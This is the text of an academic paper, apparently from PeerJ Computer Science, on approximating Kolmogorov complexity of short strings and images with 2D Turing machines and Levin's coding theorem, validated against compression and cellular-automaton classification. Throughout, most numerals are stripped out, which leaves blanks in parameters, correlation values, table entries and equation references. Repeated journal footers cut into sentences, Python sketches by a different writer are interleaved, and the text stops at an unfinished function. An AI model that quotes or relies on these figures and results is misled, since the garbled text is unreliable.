an upper bound on kolmogorov complexity. short strings, however, are difficult to compress in practice, and the theory does not provide a satisfactory solution to the problem of the instability of the measure for short strings.
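to make the compression-based approach and its short-string problem concrete, here is a small illustrative python sketch (ours, not the authors'): it uses zlib's deflate as a stand-in lossless compressor and treats compressed length as an upper-bound proxy for kolmogorov complexity.

import os
import zlib

def compressed_length(s: bytes) -> int:
    # length of the deflate-compressed form: an upper-bound proxy for K(s)
    return len(zlib.compress(s, 9))

patterned = b"01" * 500        # highly regular, 1000 characters
random_like = os.urandom(1000) # incompressible with overwhelming probability
short = b"0110"                # far too short for any compressor to exploit

print(compressed_length(patterned))    # a few dozen bytes: the regularity is captured
print(compressed_length(random_like))  # close to (or slightly above) 1000
print(compressed_length(short))        # larger than the input itself: header overhead dominates

the last line is the instability referred to in the text: below a few dozen symbols the compressor's fixed overhead swamps any structure, which is precisely the regime the coding theorem method is designed for.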
here we use so-called turmites (2-dimensional turing machines) to estimate the kolmogorov complexity of images, in particular space-time diagrams of cellular automata, using levin's coding theorem from algorithmic probability theory. we study the problem of the rate of convergence by comparing approximations to a universal distribution using different (and larger) sets of small turing machines, and by comparing the results to those of lossless compression algorithms, carefully devising tests at the intersection of the application of compression and algorithmic probability. we found that strings which are more random according to algorithmic probability also turn out to be less compressible, while less random strings are clearly more compressible. compression algorithms have proven to be signally applicable in several domains (see e.g. li & vitányi), yielding surprising results as a method for approximating kolmogorov complexity; hence their success is in part a matter of their usefulness. here we show that an alternative (and complementary) method yields results compatible with those of lossless compression. for this we devised an artful technique: grouping strings that our method indicated had the same program-size complexity, in order to construct files of concatenated strings of the same complexity (while avoiding repetition, which could easily be exploited by compression). a lossless general-purpose compression algorithm was then used to compress the files, to ascertain whether the files built from highly complex strings were indeed compressed less, and whether the files built from strings of low kolmogorov complexity were compressed more. this was indeed the case, and we report these results in 'validation of the coding theorem method by compressibility'. in 'comparison of km and compression of cellular automata' we also show that the coding theorem method yields a very similar classification of the space-time diagrams of elementary cellular automata, despite the disadvantage of having used a limited sample of a universal distribution. in all cases the statistical evidence is strong enough to suggest that the coding theorem method is sound and capable of producing satisfactory results. the coding theorem method also represents the only currently available method for dealing with very short strings, and in a sense is an expensive but powerful "microscope" for capturing the information content of very small objects.
kolmogorov-chaitin complexity
central to algorithmic information theory (ait) is the definition of algorithmic (kolmogorov-chaitin or program-size) complexity (kolmogorov; chaitin):
K_T(s) = min{ |p| : T(p) = s }.   (1)
that is, the length of the shortest program p that outputs the string s when run on a universal turing machine T. a classic example is a string composed of an alternation of bits, such as (01)^n, which can be described as "n repetitions of 01". this repetitive string can grow fast while its description will only grow by about log_2(n). on the other hand, a random-looking string may not have a much shorter description than itself.
uncomputability and instability of k
a technical inconvenience of k as a function taking s to the length of the shortest program that produces s is its uncomputability (chaitin).
in other words, there is no program which takes a string s as input and produces the integer k(s) as output. this is usually considered a major problem, but one ought to expect a universal measure of complexity to have such a property. on the other hand, k is more precisely upper semi-computable, meaning that one can find upper bounds, as we will do by applying a technique based on another semi-computable measure presented in 'solomonoff-levin algorithmic probability'. the invariance theorem guarantees that complexity values will only diverge by a constant c (e.g., the length of a compiler, a translation program between u_1 and u_2) and that they will converge at the limit.
invariance theorem (calude; li & vitányi): if u_1 and u_2 are two universal turing machines, and k_{u_1}(s) and k_{u_2}(s) the algorithmic complexity of s for u_1 and u_2, there exists a constant c such that for all s:
|k_{u_1}(s) - k_{u_2}(s)| < c.   (2)
hence the longer the string, the less important c is (i.e., the choice of programming language or universal turing machine). in practice, however, c can be arbitrarily large, because the invariance theorem says nothing about the rate of convergence between k_{u_1} and k_{u_2} for a string s of increasing length, and this has an important impact on short strings.
solomonoff-levin algorithmic probability
the algorithmic probability (also known as levin's semi-measure) of a string s describes the expected probability that a random program p produces s upon halting when run on a universal prefix-free turing machine t. (the set of valid programs forms a prefix-free set, that is, no element is a prefix of any other, a property necessary to keep 0 < m(s) < 1; for details see calude.) formally (solomonoff; levin; chaitin),
m(s) = Σ_{p : t(p) = s} 1 / 2^{|p|}.   (3)
levin's semi-measure m(s) defines a distribution known as the universal distribution (a beautiful introduction is given in kirchherr, li & vitányi). it is called a semi-measure because, unlike a probability measure, the sum over all strings is never 1; this is due to the turing machines that never halt. it is important to notice that the value of m(s) is dominated by the term contributed by the shortest program p producing s (the term with the smallest denominator 2^{|p|}), and the length of that shortest program is exactly k(s). the semi-measure m(s) is therefore also uncomputable, because for every s, computing m(s) requires the calculation of 2^{-k(s)}, which involves k itself. an alternative to the traditional use of compression algorithms is to use the concept of algorithmic probability to approximate k(s) by means of the following theorem.
coding theorem (levin):
|-log_2 m(s) - k(s)| < c.   (4)
this means that if a string has many descriptions it also has a short one. it beautifully connects frequency to complexity, more specifically the frequency of occurrence of a string with its algorithmic (kolmogorov) complexity. the coding theorem implies (cover & thomas; calude) that one can calculate the kolmogorov complexity of a string from its frequency (delahaye & zenil; zenil), simply by rewriting the formula as:
km(s) = -log_2 m(s) + o(1).   (5)
an important property of m as a semi-measure is that it dominates any other effective semi-measure µ, because there is a constant c_µ such that, for all s, m(s) ≥ c_µ µ(s). for this reason m(s) is often called a universal distribution (kirchherr, li & vitányi).
the coding theorem method
let d(n,m) be a function (delahaye & zenil) defined as follows:
d(n,m)(s) = |{t ∈ (n,m) : t produces s}| / |{t ∈ (n,m) : t halts}|,   (6)
where (n,m) denotes the set of turing machines with n states and m symbols running on empty input, and |a| denotes the cardinality of the set a. in zenil and delahaye & zenil we calculated the output distribution of turing machines with a small number of states and symbols for which the busy beaver (radó) values are known, in order to determine the halting time; in soler-toscano et al. the results were improved in terms of the number and size of the turing machines, and an alternative to the busy beaver information was proposed, so that exact knowledge of halting times is no longer needed to approximate an informative distribution. here we consider an experiment with 2-dimensional deterministic turing machines (also called turmites) in order to estimate the kolmogorov complexity of 2-dimensional objects, such as images that can represent space-time diagrams of simple systems. a turmite is a turing machine which has an orientation and operates on a grid as its "tape"; the machine can move in four directions rather than only in the traditional left and right movements of a turing machine head. a reference to this kind of investigation and a definition of 2d turing machines can be found in wolfram; one popular, and possibly one of the first, examples of this variation of a turing machine is langton's ant (langton), which has also been proven capable of turing-universal computation. in 'comparison of km and approaches based on compression' we will use turmites to provide evidence that kolmogorov complexity evaluated through algorithmic probability is consistent with the other (and today only) method for approximating k, namely lossless compression algorithms. we will do this in an artful way, given that compression algorithms are unable to compress strings that are too short, which are exactly the strings covered by our method. this will involve concatenating strings for which our method establishes a kolmogorov complexity; these are then given to a lossless compression algorithm in order to determine whether it provides consistent estimations, that is, whether strings are less compressible where our method says they have greater kolmogorov complexity, and more compressible where our method says they have lower kolmogorov complexity. we provide evidence that this is actually the case. in 'comparison of km and compression of cellular automata' we will apply the results from the coding theorem method to approximate the kolmogorov complexity of the 2-dimensional evolutions of 1-dimensional, closest-neighbor cellular automata as defined in wolfram, by way of offering a contrast to the approximation provided by a general lossless compression algorithm (deflate). as we will see, in all these experiments we provide evidence that the method is just as successful as compression algorithms, but, unlike the latter, it can deal with short strings.
deterministic 2-dimensional turing machines (turmites)
turmites, or 2-dimensional (2d) turing machines, run not on a 1-dimensional tape but on a 2-dimensional unbounded grid or array. at each step they can move in four different directions (up, down, left, right) or stop. transitions have the format {n1, m1} → {n2, m2, d}, meaning that when the machine is in state n1 and reads symbol m1, it writes m2, changes to state n2 and moves to a contiguous cell following direction d. if n2 is the halting state then d is "stop"; in all other cases d can be any of the four directions. let (n,m)_2d be the set of such turing machines with n states and m symbols. these machines have nm entries in the transition table, and for each entry {n1, m1} there are 4nm + m possible instructions, that is, m different halting instructions (writing one of the m symbols) and 4nm non-halting instructions (4 directions, n states and m different symbols). so the number of machines in (n,m)_2d is (4nm + m)^{nm}. it is possible to enumerate all these machines in the same way as 1d turing machines (e.g., as has been done in wolfram and joosten). we can assign one number to each entry in the transition table; these numbers go from 0 to 4nm + m - 1, given that there are 4nm + m different instructions. the numbers corresponding to all entries in the transition table (irrespective of the convention followed in sorting them) form a number with nm digits in base 4nm + m, so the translation of a transition table to a natural number, and vice versa, can be done through elementary arithmetical operations. we take as output for a 2d turing machine the minimal array that includes all cells visited by the machine; note that this possibly includes cells that have not been visited, but it is the most natural way of producing output in a regular format while reducing the set of different outputs. the figure shows an example of the transition table of a turing machine in (4,2)_2d and its execution over a '0'-filled grid; we show the portion of the grid that is returned as the output array, in which two of the six cells have not been visited by the machine.
[figure: top, example of a deterministic 2-dimensional turing machine; bottom, accumulated runtime distribution for (4,2)_2d.]
an approximation to the universal distribution
we have run all machines in (4,2)_2d just as we have done before for deterministic 1-dimensional turing machines (delahaye & zenil; soler-toscano et al.), that is, considering the output of all different machines starting both on a '0'-filled grid (all white) and on a '1'-filled grid (all black). symmetries are described and used in the same way as in soler-toscano et al. in order to avoid running a large number of machines whose output can be predicted from other, equivalent machines (by rotation, transposition, 0-1 complementation, reversion, etc.) that produce equivalent outputs with the same frequency. we also used a reduced enumeration to avoid running certain trivial machines whose behavior can be predicted from the transition table, as well as filters to detect non-halting machines before exhausting the entire runtime. in the reduced enumeration we considered only machines with an initial transition moving to the right and changing to a state different from the initial and halting states.
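as a concrete illustration of the enumeration and execution just described, here is a minimal python sketch (ours, not the authors' code). the digit order over transition-table entries and the ordering of the four directions are conventions chosen for the example and may differ from the ones used in the paper; only the counting argument (nm digits in base 4nm + m) is taken from the text.

from typing import Dict, List, Optional, Tuple

DIRECTIONS = [(0, 1), (0, -1), (1, 0), (-1, 0)]  # right, left, down, up (one possible convention)

def decode_machine(index: int, n: int = 4, m: int = 2) -> Dict[Tuple[int, int], Tuple]:
    """Turn a machine number into a transition table {(state, read_symbol): instruction},
    reading nm digits in base 4nm + m. Instructions are ('halt', write) or
    (write, next_state, direction)."""
    base = 4 * n * m + m
    table = {}
    for state in range(1, n + 1):
        for symbol in range(m):
            digit = index % base
            index //= base
            if digit < m:                       # the m halting instructions: write a symbol and stop
                table[(state, symbol)] = ("halt", digit)
            else:
                digit -= m
                write = digit % m
                next_state = (digit // m) % n + 1
                direction = digit // (m * n)    # 0..3
                table[(state, symbol)] = (write, next_state, direction)
    return table

def run_turmite(table, blank: int = 0, max_steps: int = 2000) -> Optional[List[List[int]]]:
    """Run a turmite on an unbounded grid filled with `blank`; return the minimal
    bounding array containing every visited cell, or None if it has not halted."""
    grid: Dict[Tuple[int, int], int] = {}
    visited = {(0, 0)}
    x = y = 0
    state = 1
    for _ in range(max_steps):
        instruction = table[(state, grid.get((x, y), blank))]
        if instruction[0] == "halt":
            grid[(x, y)] = instruction[1]
            rows = [p[0] for p in visited]
            cols = [p[1] for p in visited]
            return [[grid.get((r, c), blank) for c in range(min(cols), max(cols) + 1)]
                    for r in range(min(rows), max(rows) + 1)]
        write, state, d = instruction
        grid[(x, y)] = write
        x, y = x + DIRECTIONS[d][0], y + DIRECTIONS[d][1]
        visited.add((x, y))
    return None

looping decode_machine and run_turmite over machine indices (or over the reduced enumeration) and counting how often each output array appears is all that is needed to build the empirical distribution used below.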
machines moving to the initial state at the starting transition run forever, and machines moving to the halting state produce single-character output. so we reduce the number of initial transitions in (n,m)_2d to m(n - 1): the machine can write any of the m symbols and change to any state in {2, ..., n}. the set of different machines is reduced accordingly to m(n - 1)(4nm + m)^{nm-1}. to enumerate these machines we construct a mixed-radix number, given that the digit corresponding to the initial transition now runs from 0 to m(n - 1) - 1. to the output obtained by running this reduced enumeration we add the single-character arrays that correspond to machines moving to the halting state at the starting transition; these machines and their output can easily be counted. also, to take into account machines whose initial transition moves in a direction other than to the right, we consider the 90-, 180- and 270-degree rotations of the arrays produced, given that for any machine moving up (left/down) at the initial transition there is another one moving right that produces the identical output rotated by -90 (-180/-270) degrees.
setting the runtime
the busy beaver runtime value for (4,2) is known, but no equivalent busy beaver values are known for 2-dimensional turing machines (although variations of turmite busy beaver functions have been proposed (pegg)). so, to set the runtime in our experiment, we generated a large sample of random machines in the reduced enumeration, ran it with a generous step bound, and used the resulting runtime distribution to fix the step bound for running the complete (4,2)_2d enumeration. these machines were generated instruction by instruction: as explained above, it is possible to assign a natural number to every instruction, so to generate a random machine in the reduced enumeration for (n,m)_2d we produce a random number from 0 to m(n - 1) - 1 for the initial transition and from 0 to 4nm + m - 1 for each of the other nm - 1 transitions. we used the implementation of the mersenne twister in the boost c++ library. the output of this sample was the distribution of the runtime of the halting machines. the figure shows the probability that a random halting machine will halt within the number of steps indicated on the horizontal axis; for the chosen step bound this probability is already very close to one. note that the machines in the sample are drawn from the reduced enumeration, from which a large number of very trivial machines halting in just one step have been removed, so in the complete enumeration the probability of halting within the bound is even greater. we did find some higher runtime values: a small number of machines required more steps, the highest being a machine that progressed through a much larger number of steps before halting. we therefore have enough evidence to believe that, with the runtime bound we set, we obtained almost all (if not all) output arrays. we then ran all the turing machines in the reduced enumeration for (4,2)_2d and applied the completions explained before.
output analysis
the final output represents the result of 2(4nm + m)^{nm} executions (all machines in (4,2)_2d starting with both blank symbols, '0' and '1'). we recorded the number of non-halting machines and the number of halting machines.
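two small helpers make the bookkeeping of this section concrete; they are an illustrative sketch under the same conventions as the previous one, not the authors' boost/c++ implementation. the first draws a random machine from the reduced enumeration as a mixed-radix digit list; the second turns output counts into complexity values via the coding theorem.

import random
from collections import Counter
from math import log2

def random_reduced_machine(n: int = 4, m: int = 2) -> list:
    """One mixed-radix digit per transition-table entry: the initial transition is
    restricted to m*(n-1) values (move right, write any symbol, jump to a state other
    than the initial and halting ones); every other entry ranges over all 4nm + m
    instructions."""
    first = random.randrange(m * (n - 1))
    rest = [random.randrange(4 * n * m + m) for _ in range(n * m - 1)]
    return [first] + rest

def km_2d_from_outputs(outputs) -> dict:
    """outputs: an iterable of hashable output arrays (e.g., tuples of tuples) produced
    by the halting machines. Returns the coding-theorem estimate -log2 of the relative
    frequency of each array, i.e., Km,2D(s) = -log2 D(s)."""
    counts = Counter(outputs)
    total = sum(counts.values())
    return {array: -log2(count / total) for array, count in counts.items()}

sampling many random machines with a generous step bound and recording when the halting ones stop gives the empirical runtime distribution used to pick the cutoff; the km_2d_from_outputs step is the one that produces the complexity values discussed next.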
a large number of different binary arrays was produced after several days of calculation on a medium-sized supercomputer (a cluster of cpus, each with several gb of memory, located at the centro informático científico de andalucía (cica), spain). let d(4,2)_2d be the distribution constructed by dividing the number of occurrences of each different array by the number of halting machines, as a natural extension of eq. (6) to 2-dimensional turing machines. then, for every array s, using the coding theorem,
km,2d(s) = -log_2(d(4,2)_2d(s)).   (7)
[figure: the top objects in d(4,2)_2d preceded by their km,2d values, sorted from higher to lower frequency and therefore from smaller to larger kolmogorov complexity after application of the coding theorem; only non-symmetrical cases are displayed, and the grid is only for illustration purposes.]
the figure shows the top objects in d(4,2)_2d, that is, the objects with the lowest kolmogorov complexity values.
evaluating 2-dimensional kolmogorov complexity
d(4,2)_2d denotes the frequency distribution (a calculated universal distribution) obtained from the output of deterministic 2-dimensional turing machines, with associated complexity measure km,2d. d(4,2)_2d distributes the produced arrays over a large number of different complexity values, with non-integer minimum, maximum and mean values in bits (an explanation of non-integer program-size complexity is given in soler-toscano et al.). considering that the number of possible square binary arrays of side d is 2^{d×d} (without considering any symmetries), d(4,2)_2d can be said to produce all square binary arrays of side length up to 3, that is, Σ_{d=1..3} 2^{d×d} = 530 square arrays, together with a number of the 2^{4×4} = 65,536 square arrays of side length d = 4. it only produces a small fraction of the
what one would expect from a distribution where simple patterns are more frequent (and therefore have lower kolmogorov complexity after application of the coding theorem) would be to see patterns of the “checkerboard” type with high frequency and low random complexity (k), and this is exactly what we found (see fig. ), while random looking patterns were found at the bottom among the least frequent ones (fig. ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure symmetry breaking from fully deterministic symmetric computational rules. bottom objects in the classification with lowest frequency, or being most random according to d( , ) d. it is interesting to note the strong similarities given that similar-looking cases are not always exact symmetries. the arrays are preceded by the number of occurrences of production from all the ( , ) d turing machines. we have coined the informal notion of a “climber” as an object in the frequency classification (from greatest to lowest frequency) that appears better classified among objects of smaller size rather than with the arrays of their size, this is in order to highlight possible candidates for low complexity, hence illustrating how the process make low complexity patterns to emerge. for example, “checkerboard” patterns (see fig. ) seem to be natural “climbers” because they come significantly early (more frequent) in the classification than most of the square arrays of the same size. in fact, the larger the checkerboard array, the more of a climber it seems to be. this is in agreement with what we zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure two “climbers” (and all their symmetric cases) found in d( , ) d. symmetric objects have higher frequency and therefore lower kolmogorov complexity. nevertheless, a fully deterministic algo- rithmic process starting from completely symmetric rules produces a range of patterns of high complexity and low symmetry. have found in the case of strings (zenil, ; delahaye & zenil, ; soler-toscano et al., ) where patterned objects emerge (e.g., ( )n, that is, the string repeated n times), appearing relatively increasingly higher in the frequency classifications the larger n is, in agreement with the expectation that patterned objects should also have low kolmogorov complexity. an attempt of a definition of a climber is a pattern p of size a × b with small complexity among all a × b patterns, such that there exists smaller patterns q (say c × d, with cd < ab) such that km(p) < km(q) < median(km(all ab patterns)). for example, fig. shows arrays that come together among groups of much shorter arrays, thereby demonstrating, as expected from a measure of randomness, that array—or string—size is not what determines complexity (as we have shown before in zenil ( ), delahaye & zenil ( ) and soler-toscano et al. ( ) for binary strings). the fact that square arrays may have low kolmogorov complexity can be understood in several ways, some of which strengthen the intuition that square arrays should be less kolmogorov random, such as for example, the fact that for square arrays one only needs the information of one of its dimensions to determine the other, either height or width. figure shows cases in which square arrays are significantly better classified towards the top than arrays of similar size. 
indeed, % of the squares of size × are in the first fifth zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (f ), as are the × arrays. square arrays of × are distributed as follows when dividing ( , ) d in equal parts: . %, . %, . %, . %, . %. validation of the coding theorem method by compressibility one way to validate our method based on the coding theorem (eq. ( )) is to attempt to measure its departure from the compressibility approach. this cannot be done directly, for as we have explained, compression algorithms perform poorly on short strings, but we did find a way to partially circumvent this problem by selecting subsets of strings for which our coding theorem method calculated a high or low complexity which were then used to generate a file of length long enough to be compressed. comparison of km and approaches based on compression it is also not uncommon to detect instabilities in the values retrieved by a compression algorithm for short strings, as explained in ‘uncomputability and instability of k ’, strings which the compression algorithm may or may not compress. this is not a malfunction of a particular lossless compression algorithm (e.g., deflate, used in most popular computer formats such as zip and png) or its implementation, but a commonly encountered problem when lossless compression algorithms attempt to compress short strings. when researchers have chosen to use compression algorithms for reasonably long strings, they have proven to be of great value, for example, for dna false positive repeat sequence detection in genetic sequence analysis (rivals et al., ), in distance measures and classification methods (cilibrasi & vitanyi, ), and in numerous other applications (li & vitányi, ). however, this effort has been hamstrung by the limitations of compression algorithms–currently the only method used to approximate the kolmogorov complexity of a string–given that this measure is not computable. in this section we study the relation between km and approaches to kolmogorov complexity based on compression. we show that both approaches are consistent, that is, strings with higher km value are less compressible than strings with lower values. this is as much validation of km and our coding theorem method as it is for the traditional lossless compression method as approximation techniques to kolmogorov complexity. the coding theorem method is, however, especially useful for short strings where losses compression algorithms fail, and the compression method is especially useful where the coding theorem is too expensive to apply (long strings). compressing strings of length – for this experiment we have selected the strings in d( ) with lengths ranging from to . d( ) is the frequency distribution of strings produced by all -dimensional deterministic turing machines as described in soler-toscano et al. ( ). table shows the number of d( ) strings with these lengths. up to length we have almost all possible strings. for length we have a considerable number and for length there are less than % of the possible strings. the distribution of complexities is shown in fig. . zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure complete reduced set (non-symmetrical cases under reversion and complementation) of × patches in km, d sorted from lowest to greatest kolmogorov complexity after application of the coding theorem (eq. 
( )) to the output frequency of -d turing machines. we denote this set by km, d × . for example, the glider configurations in the game of life (gardner, ) come with high kolmogorov complexity (with approximated values of . and . ). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table number of strings of length – found in d( ). length (l) strings , , , , , , as expected, the longer the strings, the greater their average complexity. the overlapping of strings with different lengths that have the same complexity correspond to climbers. the experiment consisted in creating files with strings of different km-complexity but equal length (files with more complex (random) strings are expected to be less compressible than files with less complex (random) strings). this was done in the following way. for each l ( ≤ l ≤ ), we let s(l) denote the list of strings of length l, sorted by increasing km complexity. for each s(l) we made a partition of sets with the same number of consecutive strings. let’s call these partitions p(l,p), ≤ p ≤ . then for each p(l,p) we have created files, each with random strings in p(l,p) in random order. we called these files f(l,p,f ), ≤ f ≤ . summarizing, we now have: • different string lengths l, from to , and for each length • partitions (sorted by increasing complexity) of the strings with length l, and • files with random strings in each partition. this makes for a total of , different files. each file contains different binary strings, hence with length of × l symbols. a crucial step is to replace the binary encoding of the files by a larger alphabet, retaining the internal structure of each string. if we compressed the files f(l,p,f ) by using binary encoding then the final size of the resulting compressed files would depend not only on the complexity of the separate strings but on the patterns that the compressor discovers along the whole file. to circumvent this we chose two different symbols to represent the ‘ ’ and ‘ ’ in each one of the different strings in each file. the same set of symbols was used for all files. we were interested in using the most standard symbols we possibly could, so we created all pairs of characters from ‘a’ to ‘p’ ( different pairs) and from this set we selected two-character symbols that were the same for all files. this way, though we do not completely avoid the possibility of the compressor finding patterns in whole files due to the repetition of the same single character in different strings, we considerably reduce the impact of this phenomenon. the files were compressed using the mathematica function compress, which is an implementation of the deflate algorithm (lempel–ziv plus huffman coding). figure shows the distributions of lengths of the compressed files for the different string lengths. the horizontal axis shows the groups of files in increasing km. as the complexity of the zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure top: distribution of complexity values for different string lengths (l). bottom: distribution of the compressed lengths of the files. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure scatterplot of km with -dimensional turing machines (turmites) as a function of km with -dimensional turing machines. 
strings grows (right part of the diagrams), the compressed files are larger, so they are harder to compress. The relevant exception is the longest length considered, but this is probably related to the low number of strings of that length that we have found, which are surely not the most complex strings of that length. We have used other compressors such as gzip (which uses the Lempel–Ziv algorithm LZ77) and bzip2 (Burrows–Wheeler block-sorting text compression and Huffman coding), with several compression levels. The results are similar to those shown in the figure.

Comparing ( , )2D and ( , )
We shall now look at how 2-dimensional arrays (hence strings) produced by 2D Turing machines correlate with the strings that we have calculated before (Zenil; Delahaye & Zenil; Soler-Toscano et al.) (denoted by D( )). In a sense this is like changing the Turing machine formalism to see whether the new distribution resembles distributions following other Turing machine formalisms, and whether it is robust enough. All Turing machines in ( , ) are included in ( , )2D because these are just the machines that do not move up or down. We first compared the values of the output strings in ( , ) to the 2-dimensional arrays found in ( , )2D. We are also interested in the relation between the ranks of these strings in both ( , ) and ( , )2D.

The scatterplot figure shows the link between Km,2D with 2D Turing machines as a function of ordinary Km,1D (that is, simply Km as defined in Soler-Toscano et al.). It suggests a strong, almost linear overall association. The correlation coefficient r confirms the linear association, and the Spearman correlation coefficient rs proves a tight and increasing functional relation.

Figure: Scatterplot of Km with 2-dimensional Turing machines as a function of Km with 1-dimensional Turing machines, by length of strings.

The length l of the strings is a possible confounding factor. However, the by-length scatterplot suggests that the link between one- and 2-dimensional complexities is not explainable by l. Indeed, the partial correlation of Km,2D and Km,1D controlling for l still denotes a tight association. The figure also suggests that complexities are more strongly linked for longer strings. This is in fact the case, as the table below shows: the strength of the link increases with the length of the resulting strings. One- and 2-dimensional complexities are remarkably correlated and may be considered two measures of the same underlying feature of the strings. How these measures vary is another matter. The regression of Km,2D on Km,1D gives an approximate linear relation, Km,2D ≈ a + b·Km,1D; note that this subtle departure from identity may be a consequence of a slight non-linearity, a feature visible in the scatterplot.

Table: Correlation coefficients between one- and 2-dimensional complexities by length of strings (length l versus correlation).
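The agreement reported above (and, earlier, the agreement between Km and compressed lengths) can be quantified with standard linear and rank correlations; a minimal sketch, assuming two lists holding paired complexity values for the same strings (e.g., Km,1D and Km,2D, or Km and Deflate-compressed length):

```python
import numpy as np
from scipy import stats

def agreement(values_a, values_b):
    """Pearson r, Spearman rank correlation and a least-squares fit
    b ~ intercept + slope * a for two paired complexity estimates."""
    a = np.asarray(values_a, dtype=float)
    b = np.asarray(values_b, dtype=float)
    pearson_r, _ = stats.pearsonr(a, b)
    spearman_r, _ = stats.spearmanr(a, b)
    fit = stats.linregress(a, b)
    return {"pearson": pearson_r,
            "spearman": spearman_r,
            "intercept": fit.intercept,
            "slope": fit.slope}
```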
Comparison of Km and compression of cellular automata
A 1-dimensional CA can be represented by an array of cells x_i, where i ∈ Z (the integers) and each x takes a value from a finite alphabet Σ. Thus, a sequence of cells {x_i} of finite length n describes a string or global configuration c on Σ. This way, the set of finite configurations will be expressed as Σ^n. An evolution comprises a sequence of configurations {c_i} produced by the mapping Φ: Σ^n → Σ^n; thus the global relation is symbolized as:

Φ(c^t) → c^(t+1)   (Eq.)

where t represents time and every global state of c is defined by a sequence of cell states. The global relation is determined over the cell states in configuration c^t, updated simultaneously at the next configuration c^(t+1) by a local function φ as follows:

φ(x^t_(i−r), ..., x^t_i, ..., x^t_(i+r)) → x^(t+1)_i.   (Eq.)

Wolfram represents 1-dimensional cellular automata (CA) with two parameters (k, r), where k = |Σ| is the number of states and r is the neighborhood radius; hence this type of CA is defined by the parameters (2, 1). There are k^n different neighborhoods (where n = 2r + 1) and k^(k^n) distinct evolution rules. The evolutions of these cellular automata usually have periodic boundary conditions. Wolfram calls this type of CA elementary cellular automata (denoted simply by ECA), and there are exactly k^(k^n) = 256 rules of this type. They are considered the simplest cellular automata (and among the simplest computing programs) capable of great behavioral richness. 1-dimensional ECA can be visualized in 2-dimensional space–time diagrams where every row is an evolution in time of the ECA rule. By their simplicity, and because we have a good understanding of them (e.g., at least one ECA is known to be capable of Turing universality (Cook; Wolfram)), they are excellent candidates to test our measure Km,2D, being just as effective as other methods that approach ECA using compression algorithms (Zenil) and that have yielded the results that Wolfram obtained heuristically.

Km,2D comparison with compressed ECA evolutions
We have seen that our coding theorem method, with associated measure Km (or Km,2D in this paper for 2D Kolmogorov complexity), is in agreement with bit-string complexity as approached by compressibility, as we have reported in 'Comparison of Km and approaches based on compression'. The universal distribution from Turing machines that we have calculated (D( , )2D) will help us to classify elementary cellular automata. Classification of ECA by compressibility has been done before in Zenil, with results that are in complete agreement with our intuition and knowledge of the complexity of certain ECA rules (and related to Wolfram's classification). In Zenil, both classification by simplest initial condition and classification by random initial condition were undertaken, leading to a stable compressibility classification of ECAs. Here we followed the same procedure for both the simplest initial condition (single black cell) and a random initial condition in order to compare the classification to the one that can be approximated by using D( , )2D, as follows. We will say that the space–time diagram (or evolution) of an elementary cellular automaton c after time t has complexity:

Km,2D^(d×d)(c^t) = Σ_(q ∈ {c^t}_(d×d)) Km,2D(q)   (Eq.)

That is, the complexity of a cellular automaton c is the sum of the complexities of the q arrays or image patches in the partition matrix {c^t}_(d×d), obtained from breaking {c^t} into square arrays of side d produced by the ECA after t steps. An example of a partition matrix of an ECA evolution is shown in the corresponding figure for one ECA rule and block size d. Notice that the boundary conditions for a partition matrix may require the addition of at most d − 1 empty rows or d − 1 empty columns to the boundary as shown in Fig.
(or alternatively the dismissal of at most d − rows or d − columns) if the dimensions (height and width) are not multiples of d, in this case d = . if the classification of all rules in eca by km, d yields the same classification obtained by compressibility, one would be persuaded that km, d is a good alternative to compressibility as a method for approximating the kolmogorov complexity of objects, with the signal advantage that km, d can be applied to very short strings and very short arrays such as images. because all possible arrays of size × are present in km, d we can use this arrays set to try to classify all ecas by kolmogorov complexity using the coding theorem method. figure shows all relevant (non-symmetric) arrays. we denote by km, d × this subset from km, d. figure displays the scatterplot of compression complexity against km, d × calculated for every cellular automaton. it shows a positive link between the two measures. the pearson correlation amounts to r = . , so the determination coefficient is r = . . these values correspond to a strong correlation, although smaller than the correlation between - and -dimensional complexities calculated in ‘comparison of km and approaches based on compression’. concerning orders arising from these measures of complexity, they too are strongly linked, with a spearman correlation of rs = . . the scatterplots (fig. ) show a strong agreement between the coding theorem method and the traditional compression method when both are used to classify ecas by their approximation to kolmogorov complexity. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure all the first ecas (the other are – reverted rules) starting from the simplest (black cell) initial configuration running for t = steps, sorted from lowest to highest complexity according to km, d × . notice that the same procedure can be extended for its use on arbitrary images. zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure scatterplots of compress versus km, d × on the first eca evolutions after t = steps. top: distribution of points along the axes displaying clusters of equivalent rules and a distribution corresponding to the known complexity of various cases. bottom: same plot but with some eca rules highlighted some of which were used in the side by side comparison in fig. (but unlike there, here for a single black cell initial condition). that rules distribute on the diagonal indicates that both methods are correlated as theoretically expected (even if lossless compression is a form of entropy rate up to the compression fixed maximum word length). zenil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the anomalies found in the classification of elementary cellular automata (e.g., rule being placed among eca with high complexity according to km, d × ) is a limitation of km, d × itself and not of the coding theorem method which for d = is unable to “see” beyond -bit squares using, which is obviously very limited. and yet the degree of agreement with compressibility is surprising (as well as with intuition, as a glance at fig. shows, and as the distribution of ecas starting from random initial conditions in fig. confirms). 
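A minimal sketch of the classification procedure described above (evolve an ECA from a single black cell, cut the space–time diagram into d × d patches, and add up their Km,2D values per the partition-sum equation; the block decomposition refinement introduced below additionally replaces repeated patches by a log2 multiplicity term). The rule number, number of steps and the CTM lookup table are illustrative assumptions:

```python
def eca_diagram(rule, width, steps):
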